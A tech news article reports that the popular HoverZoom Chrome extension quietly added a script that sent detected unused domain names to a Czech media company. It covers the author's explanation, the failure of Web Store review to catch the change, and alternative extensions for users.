Beware: HoverZoom extension for Chrome turns evil
It should not happen that extensions get modified in key aspects without existing users being made aware of those changes.
We have already seen how companies take advantage of Mozilla's add-on repository by approaching add-on developers to purchase their extensions or have them modify it to gather data or implement money making schemes into the extensions.
Today it became known that the author of the popular HoverZoom extension for the Google Chrome browser also implemented "features" into the extension that many users will certainly consider unethical if only they knew about them.
A user of the extension noticed that it was acting up when connections to Github were made and after additional users reported the same issue, one user wanted to know why Hoverzoom needed to POST to a Czech media company server (http://advisormedia.cz/).
The author's reply confirmed that he agreed to enter a partnership with the company. According to his post, the script is detecting unused domain names and posts those information to the media company's site.
This script was added after a partnership has been established with a media consulting company. It detects unused domain names and posts the results to their site. The collected data is strictly anonymous.
HoverZoom is a popular extension for the Chrome browser. The Chrome Web Store lists more than 761,000 users and reviews of it have been outright positive until now. The most recent reviews on the other hand highlight the issue and rated the extension with one star.
What needs to be mentioned in this regard is that the new version, the one with the domain checking, was accepted into the Web Store which should be a concern for all users of the store. Is it the only extension for Chrome that does that, or did the Czech company contact other extension developers as well to get them to add a similar script to their extensions?
A free fork of the extension has been created by a Reddit user. Hover Free is basically the same extension, but without the domain checking part or other features the original author may have implemented into it lately.
Update: Hover Free is no longer available. It is not clear why that is the case.
We can learn a couple of things from this though. First, companies not only exploit the Mozilla Store but also the Chrome Web Store by making monetary offers to extension developers, and second, the scripts that get integrated into these extensions do not seem to be detected by reviews. This is not very reassuring though as there is not really anything that regular users can do to detect this in their extensions.
Update: The author of the original HoverZoom extension has implemented a switch in the settings which blocks anonymous usage statistics from being sent. There is no direct alternative for Chrome, but you can use the userscript Mouseover Popup Image Viewer instead which offers a similar feature set.Advertisement